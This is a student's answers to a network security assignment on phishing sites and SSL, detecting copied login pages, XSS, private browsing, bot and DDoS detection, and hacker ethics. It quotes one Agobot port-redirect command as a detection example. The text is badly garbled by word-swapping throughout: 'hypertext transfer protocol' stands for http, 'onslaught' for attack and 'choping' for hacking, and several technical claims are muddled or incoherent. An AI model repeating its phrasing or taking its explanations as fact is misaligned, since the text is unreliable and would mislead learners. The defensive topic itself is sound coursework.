This inquiry is stolen from person elses exam. Phishing web sites create a transcript of a legitimate web site and present to the user an authentic-looking login page. When the user enters a login certificate ( username/password ) the information is recorded and subsequently collected by the Phisher. The Phisher can drive traffic to the phishing page utilizing a figure of techniques, including spam electronic mail and ads.
( a ) Login pages are typically served over HTTPS utilizing the site ‘s certification.
How can phishers who do non desire to pay for a certification get around this?
The one manner the phisher usage is to compromise the web site which has already got the SSL and host the phishing page as under the same sphere.
And they normally go that far when they have a strong believe they are traveling to acquire much out of it.
Swindlers frequently host phishing content on a web site for the hazard and therefore can take advantage of a site certification, but may non recognize that they have a SSL services available and hence the content via HTTP.
Appeared any of the certifications found on phishing sites in this period to hold been issued specifically for the intent of misrepresentation
hypertext transfer protocol: //news.softpedia.com/news/Phishing-Attacks-Move-to-Using-Fake-SSL-Certificates-186445.shtml
hypertext transfer protocol: //news.netcraft.com/archives/2012/08/22/phishing-on-sites-using-ssl-certificates.html
( B ) Some phishers copy the login page as is. That is, they copy the login
page, but leave the embedded image links indicating to the existent banking site. Explain
how a banking site can utilize this fact to observe phishing sites.
The figure of times the aggressors phishing Web page design so that images are selected even from the original location, instead than keeping the depository of images on his Web site a sham. When a user loads a phishing Web page, and the browser goes and takes images of the original site. Reference URL seems as the original site URL of the site will be bogus www.abc-1.com Bank ] . On the original site if we analyze the web waiter logs and looking for leery Mentor will be able to observe a phishing onslaught in advancement. There is a possibility that aggressor can salvage the images non mention them to the web site.
another manner they use if the phisher is has copied HTML codification and images from their website.As Thus, the phishers have the reliable site before sing the bogus Location. Coding the IP reference and a clip cast, as portion of your HTML codification they likely find out if the codification was copied from their site, and the copied it. There are legion ways to accomplish this. Add Facilities between HTML tickets, including extra GET parametric quantities, or even watermark Images. The most appropriate method will depend on your web substructure.
hypertext transfer protocol: //palizine.plynt.com/issues/2006Sep/phishing-detection/
( degree Celsius ) Some phishers may do a complete transcript of the phished site, doubling all images and books on the mark page and hive away them on the phishing waiter.
( vitamin D ) Suppose the banking login page has an XSS exposure. Explain how this can do the phisher ‘s life easier.
Attacker can do a Cross site scripting onslaught with XSS exposures and let an aggressor to bring forth links to a Web site which, when clicked, supply active content which appears to arise from the site. Then the aggressor can easy Decode it from HEX and with the obfuscating cushioning Removed and he can Get the IP from it.
, but besides to treat it in the context web application, due to a failure in web application to decently get away quotation mark characters and HTML tickets.
hypertext transfer protocol: //www.planb-security.net/wp/503167-001_PhishingDetectionandPrevention.pdf
3. Your friend thinks he ‘s a security expert ( though he has n’t been to TAFE ) and claims that the best manner to protect your informations when utilizing the Internet at place is to utilize the “ private ” or “ incognito ” manner in Firefox or Chrome for sensitive minutess. What security benefits does such an action provide? Is this truly a valid manner to protect your information? If it is n’t, how would you take this cat down?
The Merely good characteristic about private browse is they do n’t salvage visited pages like it will non add any sites in a history bill of fare or an amazing saloon list. No new watchword will be saved on it, nil you enter on a hunt saloon or someplace will be on car save option. You will non establish any download file history here. Cookies will merely hive away limited information of the web sites, like login position and informations use like Java ETC.
Now where Private browse is Useful, it ‘s non that effectual to salvage you from some onslaughts suck as
Keylogging to acquire you usernames and watchwords, Stealing Browsing Cache Data to obtain you sensitive information besides with that he can raise the wireless local area network username and watchwords, virus onslaughts after you info and tracking plans.
hypertext transfer protocol: //support.mozilla.org/en-US/kb/private-browsing-browse-web-without-saving-info # w_what-does-private-browsing-not-save
hypertext transfer protocol: //internoobs.wonderhowto.com/inspiration/private-browsing-for-firefox-chrome-internet-explorer-0126965/
4. ( This inquiry is stolen from person else ‘s test ) . A bot is remotely controlled package, put to deathing on a compromised host. A botnet is a web of bots and a accountant that controls their operation. Most bots are extremely programmable, leting the bot accountant to direct plans that are executed by bots. Bot sensing and redress can be carried out on a web by analyzing web traffic, or on a host by seeking to place package that is moving as a bot.
( a ) Bots are widely used for relaying email Spam. Describe a web defence that detects bots used for Spam.
Spam filtrating service is a basic and the affectional manner to observe the Spam emails Bots, if you are running it with the antivirus its automatically traveling to Remove the Spam, virus and other electronic mail borne menaces via cloud. It ‘s besides traveling to forestall unwanted Spam and barricade the electronic mail virus.
( B ) Bots have been used for establishing distributed denial of service ( DDoS ) onslaughts. Describe a web defence that detects bots transporting out a DDoS onslaught. Use some feature of the manner DDoS onslaughts are normally done other than mensurating the sum of web traffic coming from a host on the web.
We can neutralize botnet headings ( there are normally Few ddos animal trainers deployed as compared to the figure of agents ) neutralizing few animal trainers can perchance render multiple agents unless, therefore queering DDOs onslaughts.
Through snicker as an IDS/IPS regulations can be set to fit possible DDoS Attacks from the web utilizing Snort ‘s detector ID ( SID ) as a mechanism to execute package logging.Activity log, Change point sensing ( we look for what is normal and what is unnatural traveling on ) and with Wavelenght plan to analyze the signals.
and besides we can utilize Wire shark to capture the packages of web, some of the packages are in Red can take or state us about the DDOS on the waiter. DDOS onslaughts frequently are Syn inundations coming from all over the Earth.
There is another manner of Detecting a DDOS Attacks its called a common invasion sensing model A boxes – Network activity analysis devices that can be specific hardware, package or both They gather information and expression for defined forms. These forms can include the consistent watercourse of packages by Trojans or viruses. An A box is great for observing DDoS onslaughts and router onslaughts.
Detect and Stop Malicious Requests – Because application DDoS attacks mimic regular Web application traffic, they can be hard to observe through typical web DDoS techniques. However, utilizing a combination of application-level controls and anomaly sensing, organisations can place and halt malicious traffic. Measures include:
Detect an inordinate figure of petitions from a individual beginning or user session – Automated onslaught beginnings about ever request Web pages more quickly than standard users.
Prevent known web and application DDoS attacks – Many types of DDoS onslaughts rely on simple web techniques like disconnected packages, burlesquing, or non finishing TCP handshakings. More advanced onslaughts, typically application-level onslaughts, effort to overpower server resources. These onslaughts can be detected through unusual user activity and known application onslaught signatures.
Distinguish the properties, and the wake, of a malicious petition. Some DDoS onslaughts can be detected through known onslaught forms or signatures. In add-on, many malicious Web petitions do non conform to HTTP protocol criterions. For case, the Slowloris DDoS onslaught included excess HTTP headings. In add-on, DDoS clients may bespeak Web pages that do non be. Attacks may besides bring forth Web server mistakes or decelerate Web server response clip
hypertext transfer protocol: //www.thedatachain.com/articles/2011/8/4_steps_to_defeat_a_ddos_attack_on_your_organisation
hypertext transfer protocol: //www.skullbox.net/ids.php
hypertext transfer protocol: //www.slideshare.net/MahendraPratapSingh3/idsips-snort-introduction-part-1
( degree Celsius ) One possible manner to make host-based bot sensing is to compare contents of web packages that might be bids from the accountant with system calls on the host. Explain how this thought might assist you observe a bot put to deathing a port redirect bid ( i.e. receive input on one port and direct it back out on another ) .
utilizing Libcap to capture the web traffic and filtering utilizing the twine “ redirect ” to find any feasible bid from the captured package.
For illustration the agobot which uses the following feasible bids:
& lt ; Ago & gt ; .redirect.tcp 2352 www.microsoft.com 80
& lt ; Agobot3 & gt ; redirtcp: redirecting from port 2352 to “ www.microsoft.com:80 ” .
hypertext transfer protocol: //www.stanford.edu/~stinson/paper_notes/bots/bot_refs/agobot3_commandref.html
hence by using a filter hunt “ redirect ” would perchance demo this type of package which so could be used for placing botnets within the host machine.
5. From hypertext transfer protocol: //project.cyberpunk.ru/idb/hacker_ethics.html:
The thought of a “ hacker ethic ” is possibly best formulated in Steven Levy ‘s 1984 book, Hackers: Heros of the Computer Revolution. Levy came up with six dogmas:
1. Entree to computing machines – and anything which might learn you something about the manner the universe works – should be unlimited and entire. Always yield to the Hands-On jussive mood!
2. All information should be free.
3. Mistrust authorization – promote decentalisation.
4. Hackers should be judged by their hacking, non fake standards such as degress, age, race, or place.
5. You can make art and beauty on a computing machine.
6. Computers can alter your life for the better.
ibid, from Richard Stallman
“ I do n’t cognize if there really is a hacker ‘s ethic as such, but at that place certain was an M.I.T. Artificial Intelligence Lab ethic. This was that bureaucratism should non be allowed to acquire in the manner of making anything utile. Rules did non count – consequences mattered. Rules, in the signifier of computing machine security or locks on doors, were held in entire, absolute discourtesy. We would be proud of how rapidly we would brush away whatever small piece of bureaucratism was acquiring in the manner, how small clip it forced you to blow. Anyone who dared to lock a terminus in his office, say because he was a professor and thought he was more of import than other people, would probably happen his door left unfastened the following forenoon. I would merely mount over the ceiling or under the floor, move the terminus out, or leave the door unfastened with a note stating what a large incommodiousness it is to hold to travel under the floor, “ so delight make non trouble people by locking the door any longer. ” Even now, there is a large twist at the AI Lab entitled “ the seventh-floor maestro key ” , to be used in instance anyone dares to lock up one of the more fancy terminuss. ”
The types of people who are interested and passionate about choping are the same types of people who are charged with the protection of the webs they seek to work. It ‘s about as if the inmates are taking over the refuge! Discuss how the hacker ethic can take to the ethical hacker?
Like in ethics its more about Grey hat hacker, a individual with no permission his purposes are good but he has no permission to chop, or we can state he is non an ethical hacker. Choping into the computing machine is non that simple as it discussed it ‘s a clip speaking and a long procedure, hacker spend most of their clip with the computing machines non with their household and friends.
I will give you one illustration in 2011 a cat found a defect in a old-age pension web site, while he was traveling through his Superfund program he changed some parametric quantities on the URL which lead him to person else super inside informations, so for farther testing he gone through 50 more histories and downloaded their super inside informations as a cogent evidence including nsw constabulary officers and magistrates, so he contacted the company and mentioned them there exposure in a web site. And he was making it for a good title but ace company has disabled his history straight off and stop up directing a constabulary with the legal missive saying of baleful legal action.
hypertext transfer protocol: //www.smh.com.au/it-pro/security-it/super-bad-first-state-set-police-on-man-who-showed-them-how — 770000-accounts-could-be-ripped-off-20111018-1lvx1.html
As Levy pointed out, this individual was being a hacker on the footing trusting to alter the life of the septic users by indicating out the possible defects identified but the authorization denies such art performed on the computing machine that would potentially heighten the security defect that are evident in the instance.
Past experience leads him to go an ethical hacker on the footing of ( 4. Hackers should be judged by their hacking, non fake standards such as grades, age, race, or place ) he is running his ain company now http: //www.osisecurity.com.au/ .
And We have a narrative about Kevin Mitnick how he become an ethical hacker out of Black chapeau, it ‘s about the chance and opportunity and looking at the accomplishments of a individual
hypertext transfer protocol: //www.ukessays.com/essays/philosophy/kevin-mitnick-ethical-issues-and-computer-hacking-history-philosophy-essay.php
Ethical hackers know assorted punishments within their legal power hence, all security auditing and pen testing should be performed lawfully on the footing of granted permission otherwise misused of such may ensue badly and therefore it ‘s non merely running a sets of tools on a system to find what is exploitable within that web. As Levy stated, that holding entree to computing machines enhances the acquisition experiences and hence anticipates the hands-on-practicality, which finally may alter the universe by showing better and efficient security steps within the web. Often ethical choping takes topographic points when defects are evident and as such it is comparatively expensive, nevertheless with the people around the cyberspace assisting and working countries of exposures shows the facet of Sharing pointed out by Levy ‘s accountable facet similar to that shown with MIT AI Lab.